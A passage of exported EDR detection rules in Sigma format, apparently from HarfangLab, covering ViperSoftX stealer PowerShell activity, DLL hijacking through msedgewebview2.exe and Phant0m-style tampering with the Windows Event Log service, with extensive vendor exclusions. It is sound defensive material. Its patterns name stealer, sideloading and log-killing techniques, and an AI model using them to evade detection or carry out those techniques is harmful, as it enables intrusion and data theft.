"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085512Z",
"creation_date": "2026-03-23T11:45:34.085514Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085518Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_vipersoftx_powershell.yml",
"content": "title: ViperSoftX's PowerShell Commandlet Executed\nid: 3681933f-d809-4ed2-ab94-c97f202a5989\ndescription: |\n Detects a PowerShell command related to ViperSoftX.\n ViperSoftX is an information stealer and remote access trojan known to steal sensitive information such as cryptocurrency wallets and passwords stored in browsers and password managers.\n It is recommended to analyze the process responsible for the execution of this PowerShell command as well as to look for other actions indicative of information theft.\nreferences:\n - https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2025/07/10\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Stealer.ViperSoftX\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: \"','.','RightToLeft')\"\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3681933f-d809-4ed2-ab94-c97f202a5989",
"rule_name": "ViperSoftX's PowerShell Commandlet Executed",
"rule_description": "Detects a PowerShell command related to ViperSoftX.\nViperSoftX is an information stealer and remote access trojan known to steal sensitive information such as cryptocurrency wallets and passwords stored in browsers and password managers.\nIt is recommended to analyze the process responsible for the execution of this PowerShell command as well as to look for other actions indicative of information theft.\n",
"rule_creation_date": "2025-07-10",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "368595bb-89c5-4ae7-9ff8-08badb53c525",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090206Z",
"creation_date": "2026-03-23T11:45:34.090208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msedgewebview2.yml",
"content": "title: DLL Hijacking via msedgewebview2.exe\nid: 368595bb-89c5-4ae7-9ff8-08badb53c525\ndescription: |\n Detects potential Windows DLL Hijacking via msedgewebview2.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msedgewebview2.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\ntmarta.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - 
'?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "368595bb-89c5-4ae7-9ff8-08badb53c525",
"rule_name": "DLL Hijacking via msedgewebview2.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msedgewebview2.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "368a9015-91da-4e88-9611-4dd3cf5e001c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071950Z",
"creation_date": "2026-03-23T11:45:34.071953Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071963Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/hlldz/Phant0m/",
"https://artofpwn.com/2017/06/05/phant0m-killing-windows-event-log.html",
"https://www.ired.team/offensive-security/defense-evasion/disabling-windows-event-logs-by-suspending-eventlog",
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_eventlog_thread_killer.yml",
"content": "title: Windows Event Log Svchost Process Suspiciously Accessed\nid: 368a9015-91da-4e88-9611-4dd3cf5e001c\ndescription: |\n Detects an attempt to open an svchost process in a similar way as Phant0m to kill or suspend the threads of the Windows Event Log service.\n Attackers may try to tamper with the Event Log service to prevent it from reporting malicious activities to logging or EDR solutions.\n It is recommended to investigate the process accessing the Event Log to look for malicious content or actions and to investigate any subsequent suspicious activities on the host.\nreferences:\n - https://github.com/hlldz/Phant0m/\n - https://artofpwn.com/2017/06/05/phant0m-killing-windows-event-log.html\n - https://www.ired.team/offensive-security/defense-evasion/disabling-windows-event-logs-by-suspending-eventlog\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/06/21\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection_base:\n TargetImage|endswith: '\\svchost.exe'\n TargetProcessUser: 'NT AUTHORITY\\LOCAL SERVICE'\n TargetProcessCommandLine|contains|all:\n - 'svchost.exe -k LocalServiceNetworkRestricted'\n - 'EventLog'\n\n selection_variant_phant0m_v1:\n # https://github.com/hlldz/Phant0m/blob/595360122763137aea3a0f5736c28e0d931e8c6d/old/Invoke-Phant0m.ps1#L1018\n GrantedAccess: '0x1f3fff'\n CallTrace:\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+?????|UNKNOWN(????????????????)'\n - 
'\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\ntdll.dll+?????|\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\KernelBase.dll+?????|UNKNOWN(????????????????)'\n\n selection_variant_generic:\n # https://www.ired.team/offensive-security/defense-evasion/disabling-windows-event-logs-by-suspending-eventlog-service-threads#code\n GrantedAccess: '0x1fffff'\n CallTrace|contains: 'UNKNOWN'\n #CallTrace:\n # - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+?????|*|?:\\Windows\\System32\\kernel32.dll+?????|C:\\Windows\\System32\\ntdll.dll+?????'\n # - '\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\ntdll.dll+?????|\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\KernelBase.dll+?????|*|\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\kernel32.dll+?????|\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\ntdll.dll+?????'\n\n selection_variant_phant0m_v2_no_name:\n # https://github.com/hlldz/Phant0m/blob/89d722204c6e2f8b1b17da0a9b20b1e98ca3f576/phant0m/include/technique_1.h#L81\n GrantedAccess: '0x10'\n ProcessOriginalFileName: ''\n ProcessInternalName: ''\n\n selection_variant_phant0m_v2_unknown_module:\n # https://github.com/hlldz/Phant0m/blob/89d722204c6e2f8b1b17da0a9b20b1e98ca3f576/phant0m/include/technique_1.h#L81\n GrantedAccess: '0x10'\n CallTrace|contains: 'UNKNOWN'\n\n exclusion_hook:\n CallTrace: '*Windows\\SysWOW64\\ntdll.dll+?????|UNKNOWN(00000000????????)|?:\\\\*?:\\Windows\\SysWOW64\\kernel32.dll+*|?:\\Windows\\SysWOW64\\ntdll.dll+*'\n\n exclusion_net:\n # False positive with Microsoft .NET\n # Example PowerShell Get-Process cmdlet :\n # 
C:\\Windows\\System32\\ntdll.dll+9d234|C:\\Windows\\System32\\KernelBase.dll+2c0fe|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+381e70|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+2fa12e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+2f8cd5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+2c3b1e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+2c01f5|UNKNOWN(00007ffc4002cc2a)\n CallTrace:\n - '*\\System.ni.dll+*\\System.ni.dll+*\\System.ni.dll+????UNKNOWN(????????????????)'\n - '*\\System.ni.dll+*\\System.ni.dll+*\\System.ni.dll+?????UNKNOWN(????????????????)'\n - '*\\System.ni.dll+*\\System.ni.dll+*\\System.ni.dll+??????UNKNOWN(????????????????)'\n - '*\\System.ni.dll+*\\System.ni.dll+*\\System.ni.dll+???????UNKNOWN(????????????????)'\n\n exclusion_tmmon_trendmicro_1:\n # ...C:\\Windows\\SysWOW64\\ntdll.dll+51843|C:\\Windows\\SysWOW64\\ntdll.dll+519b1|C:\\Windows\\SysWOW64\\ntdll.dll+52255|C:\\Windows\\SysWOW64\\ntdll.dll+4e272|C:\\Windows\\SysWOW64\\ntdll.dll+4deb6|C:\\Windows\\SysWOW64\\tmumh\\20019\\TmMon\\2.9.0.1036\\tmmon.dll+62c39|UNKNOWN(00000000036d05b2)|C:\\Windows\\SysWOW64\\KernelBase.dll+110766\n # ...|C:\\Windows\\SysWOW64\\ntdll.dll+72c3c|C:\\Windows\\SysWOW64\\tmumh\\20019\\TmMon\\2.9.0.1027\\tmmon.dll+6d519|UNKNOWN(000000000092027c)|C:\\Windows\\SysWOW64\\KernelBase.dll+10ffd8|....\n CallTrace|contains: '?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\tmumh\\\\*\\TmMon\\\\*\\tmmon.dll+?????|UNKNOWN(000000??????????)|?:\\Windows\\SysWOW64\\KernelBase.dll+??????'\n\n exclusion_tmmon_trendmicro_2:\n # C:\\Windows\\System32\\ntdll.dll+a6144|C:\\Windows\\System32\\tmumh\\20019\\TmMon\\2.9.0.1041\\tmmon64.dll+20af8|UNKNOWN(0000022eb3212040)\n # 
C:\\Windows\\System32\\ntdll.dll+9044a|C:\\Windows\\System32\\tmumh\\20019\\TmMon\\2.9.0.1049\\tmmon64.dll.1092904734+20af8|UNKNOWN(000000186d2da040)\n CallTrace:\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\tmumh\\\\*\\TmMon\\\\*\\tmmon64.dll+?????|UNKNOWN(000?????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\tmumh\\\\*\\TmMon\\\\*\\tmmon64.dll.*+?????|UNKNOWN(000?????????????)'\n\n exclusion_bitdefender_dll:\n # C:\\Windows\\System32\\ntdll.dll+9d204|C:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_265967468665702422\\atcuf64.dll+65cb7|C:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_265967468665702422\\atcuf64.dll+8df8|UNKNOWN(000002b741f510c7)\n # too many different grantedaccess, don't use it...\n # GrantedAccess:\n # - '0x1010'\n # - '0x1410'\n # - '0x1411'\n # - '0x101410'\n # - '0x1f3fff'\n CallTrace|endswith:\n - '|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_??????????????????\\atcuf64.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_??????????????????\\atcuf64.dll+????|UNKNOWN(00000???????????)'\n - '|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\\\??????????????????\\atcuf64.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\\\??????????????????\\atcuf64.dll+????|UNKNOWN(00000???????????)'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\dlls_??????????????????\\atcuf64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\dlls_??????????????????\\atcuf64.dll+????|UNKNOWN(00000???????????)'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\\\??????????????????\\atcuf64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\\\??????????????????\\atcuf64.dll+????|UNKNOWN(00000???????????)'\n\n exclusion_bitdefender_dll_32bits:\n CallTrace|contains:\n - '|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_??????????????????\\atcuf32.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint 
Security\\atcuf\\dlls_??????????????????\\atcuf32.dll+????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\\\??????????????????\\atcuf32.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\\\??????????????????\\atcuf32.dll+????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\dlls_??????????????????\\atcuf32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\dlls_??????????????????\\atcuf32.dll+????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\\\??????????????????\\atcuf32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\\\??????????????????\\atcuf32.dll+????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm32.dll+?????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000???????????)|?:\\'\n\n exclusion_malwarebytes_service:\n ProcessProcessName: 'MBAMService.exe'\n ProcessInternalName: 'MBAMService.exe'\n ProcessOriginalFileName: 'MBAMService.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Malwarebytes Inc'\n - 'Malwarebytes Inc.'\n\n exclusion_connectifyd:\n ProcessProcessName: 'Connectifyd.exe'\n ProcessInternalName: 'Connectifyd.exe'\n ProcessOriginalFileName: 'Connectifyd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Connectify (Connectify, Inc.)'\n\n exclusion_ms_sensor:\n ProcessProcessName: 'SensorLogonTask.exe'\n ProcessInternalName: 'SensorLogonTask.exe'\n ProcessOriginalFileName: 'SensorLogonTask.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_ms_sql_server_installer:\n 
CallTrace|contains: 'sqlprocesssub.dll'\n ProcessInternalName: 'Microsoft.SqlServer.Chainer.Setup'\n ProcessOriginalFileName: 'Microsoft.SqlServer.Chainer.Setup.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_symantec_service_framework1:\n ProcessProcessName: 'ccSvcHst.exe'\n ProcessOriginalFileName: 'ccSvcHst.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n GrantedAccess: '0x1fffff'\n\n exclusion_symantec_service_framework2:\n ProcessImage: '?:\\Windows\\System32\\cscript.exe'\n ProcessParentImage: '?:\\Program Files\\Symantec\\Symantec Endpoint Protection\\\\*\\Bin64\\ccSvcHst.exe'\n\n exclusion_bitdefender_service:\n CallTrace|contains|all:\n - 'Bitdefender Security'\n - 'atcuf64.dll'\n ProcessProcessName: 'svchost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_avira_setup:\n CallTrace|contains|all:\n - 'Avira'\n - 'systemutilities.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Avira Operations GmbH ? Co. 
KG'\n\n exclusion_cylance:\n ProcessSigned: 'true'\n ProcessSignature: 'Cylance, Inc.'\n\n exclusion_windows_defender:\n CallTrace|contains|all:\n - '?:\\Program Files\\Windows Defender\\MpSvc.dll'\n - '?:\\Program Files\\Windows Defender\\MpClient.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_dell:\n CallTrace|contains|all:\n - '\\Dell\\SupportAssistAgent\\'\n - 'Reaver.dll'\n ProcessProcessName: 'Dsapi.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PC-Doctor, Inc.'\n\n exclusion_wmi_win32_process_list:\n CallTrace|contains:\n - '?:\\Windows\\SYSWOW64\\wbem\\WmiPerfClass.dll'\n - '?:\\Windows\\System32\\wbem\\WmiPerfClass.dll'\n ProcessProcessName: 'WmiPrvSE.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wmi_perfproc:\n CallTrace|contains|all:\n - '\\perfproc.dll'\n - '\\pdh.dll'\n ProcessProcessName: 'WmiPrvSE.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_msiexec_perfproc:\n CallTrace|contains|all:\n - '\\perfproc.dll'\n - '\\msi.dll'\n ProcessProcessName: 'msiexec.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_sqlserver:\n ProcessProcessName: 'scenarioengine.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_mpengine_dll:\n # C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{4D3EBD53-6213-4DF5-93EE-076A6A0589B1}\\mpengine.dll+1b3845\n CallTrace|contains:\n - 'Definition Updates\\{????????-????-????-????-????????????}\\mpengine.dll'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MpSvc.dll'\n #ProcessProcessName:\n # - 'MsMpEng.exe'\n # # Windows 7 with Windows Defender\n # - 'svchost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n # Windows 7 with Windows Defender\n - 'Microsoft Windows'\n GrantedAccess: '0x1FFFFF'\n\n exclusion_msmpeng:\n ProcessSigned: 'true'\n ProcessSignature:\n 
- 'Microsoft Windows Publisher'\n # Windows 7 with Windows Defender\n - 'Microsoft Windows'\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n\n exclusion_optimize_it_service_host:\n ProcessProcessName: 'ServiceHost.exe'\n ProcessImage:\n - '?:\\Program Files (x86)\\OptimizeIT\\CollectIT Service\\ServiceHost.exe'\n - '?:\\Program Files\\OptimizeIT\\CollectIT Service\\ServiceHost.exe'\n GrantedAccess: '0x1f3fff'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfetp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe' # C:\\Program Files\\McAfee\\Endpoint Security\\Firewall\\mfefw.exe\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n exclusion_kaspersky1:\n ProcessProcessName:\n - 'avp.exe'\n - 'Antivirus.OutprocScanner.exe'\n - 'kavfswp.exe' # ?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Windows Server\\kavfswp.exe\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Kaspersky Lab'\n - 'Kaspersky Lab JSC'\n exclusion_kaspersky2:\n ProcessOriginalFileName: 'Kaspersky Virus Removal Tool.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'AO Kaspersky Lab'\n\n exclusion_battleeye:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\BattlEye\\BEService.exe'\n\n exclusion_kited:\n ProcessImage: '?:\\Program Files\\Kite\\kited.exe'\n\n exclusion_trendmicro:\n ProcessProcessName:\n - 'TmCCSF.exe'\n # C:\\Program Files (x86)\\Trend Micro\\Security Agent\\Ntrtscan.exe\n - 'Ntrtscan.exe'\n - 'coreServiceShell.exe' # C:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe\n - 'TMBMSRV.exe' # C:\\Program Files (x86)\\Trend Micro\\BM\\TMBMSRV.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_csrss:\n ProcessProcessName: 'csrss.exe'\n ProcessImage: '?:\\Windows\\System32\\csrss.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n ProcessIntegrityLevel: 'System'\n # 
%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\n ProcessCommandLine|contains: '%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection='\n\n exclusion_norton:\n ProcessProcessName: 'NortonSecurity.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NortonLifeLock Inc.'\n\n exclusion_rpc:\n ProcessProcessName: 'services.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n CallTrace|contains: '?:\\Windows\\System32\\rpcrt4.dll'\n GrantedAccess: '0x1FFFFF'\n\n exclusion_easeus:\n ProcessProcessName: 'Agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CHENGDU YIWO Tech Development Co., Ltd.'\n CallTrace|contains: '?:\\Program Files (x86)\\EaseUS\\Todo Backup\\bin\\CmdManager.dll'\n\n exclusion_exchange:\n ProcessProcessName: 'ExSetupUI.exe'\n ProcessInternalName: 'ExSetupUI.exe'\n ProcessOriginalFileName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_wmiprvse:\n ProcessImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch'\n - '?:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p'\n GrantedAccess:\n - '0x1f3fff'\n - '0x1f1fff'\n CallTrace:\n - '?:\\Windows\\System32\\ntdll.dll+????|?:\\Windows\\System32\\KernelBase.dll+????|UNKNOWN(0000????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+????|?:\\Windows\\System32\\KernelBase.dll+?????|UNKNOWN(0000????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+????|UNKNOWN(0000????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+?????|UNKNOWN(0000????????????)'\n - 
'?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+????|UNKNOWN(0000????????????)|UNKNOWN(0000????????????)|*?:\\Windows\\Microsoft.NET\\Framework\\\\*\\clr.dll*'\n\n exclusion_realtek:\n ProcessImage:\n - '?:\\Windows\\System32\\RtkAudUService64.exe'\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\\\*\\RtkAudUService64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Realtek Semiconductor Corp.'\n\n exclusion_examshield:\n ProcessImage|endswith: '\\AppData\\Roaming\\Peoplecert\\ExamShield\\ExamShield.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PEOPLECERT INTERNATIONAL LTD'\n\n exclusion_examshield_parent:\n ProcessProcessName: 'ExamShield.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PEOPLECERT INTERNATIONAL LTD'\n\n exclusion_nable:\n ProcessImage: '?:\\ProgramData\\GetSupportService_N-Central\\Updates\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'N-ABLE TECHNOLOGIES LTD'\n\n exclusion_panda:\n ProcessOriginalFileName: 'PSANHost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Panda Security S.L.'\n - 'Panda Security, S.L.'\n\n exclusion_lenovo:\n ProcessProcessName:\n - 'LenovoVantage-(SmartPerformanceAddin).exe'\n # C:\\windows\\System32\\DriverStore\\FileRepository\\fn.inf_amd64_b35e68dd5c21bba8\\driver\\TPHKLOAD.exe\n - 'tphkload.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Lenovo'\n\n exclusion_ivanti:\n CallTrace|contains:\n - 'Program Files\\Ivanti\\Endpoint\\atcuf\\\\*\\atcuf64.dll'\n - 'Program Files\\Ivanti\\Endpoint\\bdhkm32.dll'\n ProcessProcessName:\n - 'WmiPrvSE.exe'\n - 'tphkload.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Lenovo'\n\n exclusion_bitdefender_injection_64:\n CallTrace|startswith:\n # \\Bitdefender\\Endpoint Security\\ and \\Bitdefender\\Bitdefender Security\\\n - 